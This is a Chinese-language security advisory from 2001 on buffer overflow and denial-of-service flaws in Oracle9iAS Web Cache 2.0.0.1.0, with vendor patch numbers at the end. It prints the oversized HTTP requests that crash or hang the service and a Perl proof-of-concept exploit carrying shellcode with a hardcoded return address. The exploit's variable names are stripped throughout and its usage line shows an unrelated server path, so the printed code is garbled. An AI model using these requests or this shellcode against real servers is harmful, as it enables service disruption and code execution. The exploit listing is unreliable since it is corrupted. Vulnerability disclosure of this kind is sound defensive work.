发布日期: 2001-10-18
更新日期: 2001-10-19
受影响的系统: Oracle9iAS Web Cache/2.0.0.1.0
描述:
Oracle9iAS Web Cache/2.0.0.1.0存在多个安全漏洞,可能导致拒绝服务或者缓冲区溢出。
Oracle9iAS Web Cache提供了4项服务,分别为:
Port 1100 =引入的Web缓冲代理服务 Port 4000 =管理接口 Port 4001 = Web XML无效性端口 Port 4002 =统计端口
下面的两种漏洞对这4项服务都有效。
*当发送包含“/ + 'A' x 3095 + 'N' x 4”的URL请求时,会导致缓冲区溢出,这时Oracle9iAS Web Cache进程会终止,状态信息如下:
<....snip>
State Dump for Thread Id 0x104
eax=00000c1d ebx=00000000 ecx=00000c1d edx=026f0041
esi=01baac86 edi=0040deb6
eip=4e4e4e4e esp=0632fe08 ebp=41414141 iopl=0
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000216
<snip....>
*当发送一个超过3570个字符的URL请求('GET /<3571 x A> HTTP/1.0')时,Oracle9iAS Web Cache进程退出,没有堆溢出。
下面的三种拒绝服务攻击可能导致进行挂起和CPU占用率100%,只有重新启动才能恢复正常功能。
*发送大约3094个字符的请求 *在HTTP头中发送超过4000个字符的请求,如:
'GET / HTTP/1.0' 'User-Agent: <4000 x A>'
*发送下面的请求: 'GET /. HTTP/1.0' (只影响Web缓冲代理和管理接口服务)
<*来源:George Hedfors (george.hedfors@defcom.com)
Andreas Junestam(andreas.junestam@defcom.com)
参考:http://archives.neohapsis.com/archives/bugtraq/2001-10/0134.html
*>
测试程序:
警告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
andreas junestam (andreas.junestam@defcom.com)提供了如下测试代码:
#########################################################################
#
# Proof-of-concept exploit for Oracle9iAS Web Cache/2.0.0.1.0
# Creates the file c:defcom.iyd
# By andreas@defcom.com (C)2001
#
#
# Since we do not control the space after what ESP points to, I was lazy
# and did a direct buffer jump. So, if it does not work, try changing
# the return address(start of buffer in mem) to one that fits your system.
# The buffer starts at 0x05c5f1e8 on my box(WIN2K prof SP2).
# /andreas
#
#########################################################################
=@ARGV;
if ( !=1) {
print "Usage: /data0/apache/share/cgi-bin/publish/doc_edit.pl <host>
";
print "Example: /data0/apache/share/cgi-bin/publish/doc_edit.pl 127.0.0.1
";
exit;
}
use Socket;
my(,,,,);
=;
= "1100"; # default port for the web cache
= inet_aton() or die "Error: ";
= sockaddr_in(, ) or die "Error: ";
= getprotobyname('tcp') or die "Error: ";
socket(SOCK, PF_INET, SOCK_STREAM, ) or die "Error: ";
connect(SOCK, ) or die "Error: ";
$sploit =
"\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc
9";
$sploit= .
"\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit= .
"\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit= .
"\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit= .
"\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "GET " . . "" x (3096 - length()) .
"\xe8\xf1\xc5\x05" . " HTTP/1.0\n\n";
print ;
send(SOCK, , 0) or die "Cannot send query: ";
sleep(1);
close(SOCK);
exit;
建议:
厂商补丁:
目前厂商已经发布了补丁程序以修复这个漏洞,请到厂商的主页下载:metalink.oracle.com
NT/WIN2K: Patch number 2044682
SUN Sparc Solaris: Patch number 2042106
HP-UX: Patch number 2043908
Linux: Patch number 2043924
Compaq Tru64 Unix: Patch number 2043921
IBM AIX: Patch number 2043917
   手机铃声下载 快乐多多 快来搜索好歌!       新浪企业广场诚征全国代理
|